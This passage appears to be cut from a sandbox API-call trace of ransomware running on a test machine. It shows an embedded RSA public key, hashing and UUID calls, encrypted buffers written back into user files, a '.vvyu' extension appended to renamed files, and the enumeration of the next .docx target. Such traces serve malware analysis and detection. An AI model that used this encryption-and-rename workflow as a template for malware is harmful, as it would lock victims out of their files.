KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.646] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0196.647] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.647] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.647] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.647] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.647] GetLastError () returned 0x0 [0196.647] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0196.647] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0196.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.648] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.648] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.648] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9830) returned 0x2af5168 [0196.648] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0196.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea3c8 [0196.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6620 [0196.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea410 [0196.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6638 [0196.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6668 [0196.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66c8 [0196.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6680 [0196.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.650] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0196.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0196.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66c8 [0196.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0196.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6680 [0196.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6668 [0196.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0196.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0196.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0196.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0196.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0196.653] GetCurrentThreadId () returned 0x5d8 [0196.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0196.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2150 [0196.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0196.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0196.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.654] GetCurrentThreadId () returned 0x5d8 [0196.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0196.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66c8 [0196.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6668 [0196.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0196.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6680 [0196.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6650 [0196.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66e0 [0196.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0196.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66b0 [0196.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6698 [0196.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66f8 [0196.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6698 [0196.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0196.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0196.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6668 [0196.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0196.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0196.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0196.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0196.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0196.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea410 | out: hHeap=0x2c0000) returned 1 [0196.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0196.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.666] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x982e, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x982e, lpOverlapped=0x0) returned 1 [0196.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.667] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9833, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.667] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0196.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0196.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0196.668] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.669] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.669] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.669] CloseHandle (hObject=0x584) returned 1 [0196.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0196.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x2af3f88 [0196.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0196.671] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\q-8_5Alv-AYsZTdLcX.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\q-8_5alv-aysztdlcx.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\q-8_5Alv-AYsZTdLcX.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\q-8_5alv-aysztdlcx.m4a.vvyu")) returned 1 [0196.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.672] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0196.675] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f4fa5d0, ftCreationTime.dwHighDateTime=0x1d89726, ftLastAccessTime.dwLowDateTime=0xeca3d310, ftLastAccessTime.dwHighDateTime=0x1d89873, ftLastWriteTime.dwLowDateTime=0xeca3d310, ftLastWriteTime.dwHighDateTime=0x1d89873, nFileSizeHigh=0x0, nFileSizeLow=0x16e3e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v_uiD 9U5nghF.docx", cAlternateFileName="V_UID9~1.DOC")) returned 1 [0196.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0196.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edc48 [0196.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0196.676] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\v_uiD 9U5nghF.docx") returned=".docx" [0196.676] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\v_uiD 9U5nghF.docx" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\v_uid 9u5nghf.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.676] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=93758) returned 1 [0196.676] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.680] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16e18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.680] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, 